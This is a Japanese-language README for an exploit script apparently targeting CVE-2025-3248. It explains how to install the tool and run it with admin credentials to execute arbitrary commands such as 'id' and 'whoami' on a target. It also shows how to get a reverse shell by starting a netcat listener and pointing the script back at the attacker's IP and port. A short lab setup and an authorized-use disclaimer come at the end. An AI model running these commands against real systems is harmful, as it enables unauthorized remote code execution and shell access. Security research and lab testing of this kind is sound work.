
このPythonスクリプトはCVE-2025-3248を悪用して、脆弱なシステム上で任意のコマンドを実行したり、リバースシェルを起動したりします。このエクスプロイトを使用するには認証が必要です。
このPythonスクリプトは、CVE-2025-3248を悪用して、脆弱性のあるシステム上で任意のコマンドを実行したり、リバースシェルを生成したりします。このエクスプロイトを使用するには認証が必要です。
requests ライブラリ依存関係は次のコマンドでインストールします:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| 引数 | 説明 | 必須 |
|---|---|---|
-u, --url | ターゲットのベースURL(例:https://target.com) | はい |
-l, --login | 管理者ユーザー名 | はい |
-p, --password | 管理者パスワード | はい |
-c, --command | ターゲット上で実行するコマンド | いいえ* |
--proxy | プロキシURL(例:http://127.0.0.1:8080) | いいえ |
--lhost | リバースシェル用のローカルホスト | いいえ* |
--lport | リバースシェル用のローカルポート | いいえ* |
* コマンド(-c)またはリバースシェル用の--lhostと--lportの両方を指定する必要があります。
python3 exploit.py -u https://target.com -l admin -p password -c "id"
あなたのマシンでリスナーを起動します:
nc -lvnp 4444
次に実行します:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
次のコマンドでDockerイメージをデプロイできます:
podman compose up -d
イメージはhttp://localhost:7860で利用可能になります。
composeファイルのクレジット: このリポジトリ
このスクリプトは教育および許可されたペネトレーションテストの目的のみで使用してください。 所有していない、または明示的な許可を得ていないシステムに対して使用しないでください。
このREADMEはAIによって生成されました。